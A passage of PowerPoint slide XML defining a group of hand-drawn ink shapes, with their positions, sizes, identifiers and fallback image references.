            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2406892" y="327852"/>
            <a:ext cx="6225480" cy="5096520"/>
            <a:chOff x="2406892" y="327852"/>
            <a:chExt cx="6225480" cy="509652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4DFF426-6EC2-5F41-74D3-E2B4067982C1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6673972" y="1359612"/>
                <a:ext cx="156960" cy="896760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="12" name="Ink 11">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4DFF426-6EC2-5F41-74D3-E2B4067982C1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6637972" y="1323612"/>
                  <a:ext cx="228600" cy="96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1378D08-CE94-800A-C3AF-6714271CAC64}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6736612" y="1154052"/>
                <a:ext cx="1895760" cy="1320120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="13" name="Ink 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1378D08-CE94-800A-C3AF-6714271CAC64}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId9"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6700972" y="1118412"/>
                  <a:ext cx="1967400" cy="1391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B3DB1425-2C1A-1826-76ED-2DAAAA0B878C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7018132" y="1703772"/>
                <a:ext cx="325440" cy="420480"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="14" name="Ink 13">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3DB1425-2C1A-1826-76ED-2DAAAA0B878C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6982132" y="1667772"/>
                  <a:ext cx="39708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0F38DCDA-9B6F-ACCC-83CC-C877E1CCE09A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7529692" y="1930212"/>
                <a:ext cx="108720" cy="142920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="15" name="Ink 14">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F38DCDA-9B6F-ACCC-83CC-C877E1CCE09A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId13"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7494052" y="1894572"/>
                  <a:ext cx="1803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533EC692-A65E-88D9-AB04-C4C60FD4DDFB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7603852" y="1601892"/>
                <a:ext cx="360" cy="9360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="16" name="Ink 15">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{533EC692-A65E-88D9-AB04-C4C60FD4DDFB}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId15"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7568212" y="1566252"/>
                  <a:ext cx="720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628D3124-6F88-940B-8F2C-AB6342729247}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7782052" y="1805292"/>
                <a:ext cx="64080" cy="189360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="17" name="Ink 16">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{628D3124-6F88-940B-8F2C-AB6342729247}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId17"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7746412" y="1769292"/>
                  <a:ext cx="1357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 name="Ink 1">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBCD9156-A8A3-9E99-3FBF-F6E6CD28AC02}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3109612" y="1555092"/>
                <a:ext cx="131040" cy="750600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="2" name="Ink 1">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBCD9156-A8A3-9E99-3FBF-F6E6CD28AC02}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId19"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3073612" y="1519452"/>
                  <a:ext cx="202680" cy="82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 name="Ink 2">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80CCAA33-BCB3-FAAD-1920-14FD54F5D9E2}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3266572" y="1194732"/>
                <a:ext cx="1430280" cy="1218240"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="3" name="Ink 2">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80CCAA33-BCB3-FAAD-1920-14FD54F5D9E2}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId21"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3230932" y="1158732"/>
                  <a:ext cx="1501920" cy="1289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 name="Ink 3">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DD65087-0B1A-DBFA-55D8-B8D2366C749C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3305452" y="2241972"/>
                <a:ext cx="953640" cy="118800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="4" name="Ink 3">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DD65087-0B1A-DBFA-55D8-B8D2366C749C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId23"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3269452" y="2205972"/>
                  <a:ext cx="10252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 name="Ink 4">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78ECAEC9-D2B2-117E-4162-BA217D09C34C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3531172" y="1586052"/>
                <a:ext cx="111240" cy="432360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="5" name="Ink 4">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78ECAEC9-D2B2-117E-4162-BA217D09C34C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId25"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3495532" y="1550412"/>
                  <a:ext cx="18288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Ink 5">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCB39AE8-27A5-40E2-2B39-2D564C964025}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3641692" y="1601892"/>
                <a:ext cx="232560" cy="402120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="6" name="Ink 5">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCB39AE8-27A5-40E2-2B39-2D564C964025}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId27"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3606052" y="1566252"/>
                  <a:ext cx="30420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Ink 6">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B9C602C-B458-1E9E-E597-7F812F3E18FA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3594892" y="1781532"/>
                <a:ext cx="219240" cy="93960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="7" name="Ink 6">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B9C602C-B458-1E9E-E597-7F812F3E18FA}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId29"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3559252" y="1745892"/>
                  <a:ext cx="290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Ink 7">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC93AFD5-F028-C7A9-44F9-51742392FD7B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3883972" y="1608732"/>
                <a:ext cx="172440" cy="79560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="8" name="Ink 7">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC93AFD5-F028-C7A9-44F9-51742392FD7B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId31"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3848332" y="1572732"/>
                  <a:ext cx="2440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Ink 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A2B2744-F8BB-B5DB-DF2B-6B36B7E1F87C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4069732" y="1547172"/>
                <a:ext cx="93960" cy="383040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="9" name="Ink 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A2B2744-F8BB-B5DB-DF2B-6B36B7E1F87C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId33"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4033732" y="1511172"/>
                  <a:ext cx="16560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Ink 9">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA7AAC63-3CEF-D470-257D-5F8E9A65D0DB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4149292" y="1657692"/>
                <a:ext cx="134640" cy="93240"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="10" name="Ink 9">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA7AAC63-3CEF-D470-257D-5F8E9A65D0DB}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId35"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4113652" y="1621692"/>
                  <a:ext cx="2062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Ink 10">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5826D04-29F8-7F08-81D3-9166A42DFD8C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4274212" y="1500012"/>
                <a:ext cx="79560" cy="446040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="11" name="Ink 10">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5826D04-29F8-7F08-81D3-9166A42DFD8C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId37"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4238212" y="1464372"/>
                  <a:ext cx="15120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424CE472-DF3A-E7C6-1AF0-E275D0A5AD09}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3352252" y="3431052"/>
                <a:ext cx="179640" cy="919440"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="20" name="Ink 19">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{424CE472-DF3A-E7C6-1AF0-E275D0A5AD09}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId39"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3316612" y="3395052"/>
                  <a:ext cx="251280" cy="991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 name="Ink 20">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F066882-881F-C7DA-1384-AD1C77E43045}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3368092" y="3219012"/>
                <a:ext cx="2210400" cy="1291680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="21" name="Ink 20">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F066882-881F-C7DA-1384-AD1C77E43045}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId41"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3332452" y="3183012"/>
                  <a:ext cx="2282040" cy="1363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94839FFE-233F-C69D-8E26-1533DA2B52D3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3710812" y="3516732"/>
                <a:ext cx="72000" cy="411840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="23" name="Ink 22">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94839FFE-233F-C69D-8E26-1533DA2B52D3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId43"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3674812" y="3480732"/>
                  <a:ext cx="14364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a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63E76414-6495-E7D2-5542-FCEBE54900EE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3860212" y="3407292"/>
                <a:ext cx="209880" cy="469080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="24" name="Ink 23">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63E76414-6495-E7D2-5542-FCEBE54900EE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId45"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3824572" y="3371292"/>
                  <a:ext cx="28152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D2570140-CC77-03C5-332E-F00C2534DF4C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3883972" y="3708612"/>
                <a:ext cx="172440" cy="34920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="25" name="Ink 24">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2570140-CC77-03C5-332E-F00C2534DF4C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId47"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3848332" y="3672972"/>
                  <a:ext cx="2440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BC3D0BF8-FF16-DA8A-E384-302B3028B448}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4414612" y="3563532"/>
                <a:ext cx="118800" cy="313200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="26" name="Ink 25">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC3D0BF8-FF16-DA8A-E384-302B3028B448}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId49"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4378972" y="3527532"/>
                  <a:ext cx="19044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99F755EF-C26E-8FB4-7537-809D65A2DBD6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3976492" y="4079412"/>
                <a:ext cx="182520" cy="234360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="27" name="Ink 26">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99F755EF-C26E-8FB4-7537-809D65A2DBD6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId51"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3940852" y="4043412"/>
                  <a:ext cx="254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 27">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95C84BFB-990C-B8B0-FC53-F014EE966A01}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3969652" y="3962052"/>
                <a:ext cx="259920" cy="410760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="28" name="Ink 27">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95C84BFB-990C-B8B0-FC53-F014EE966A01}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
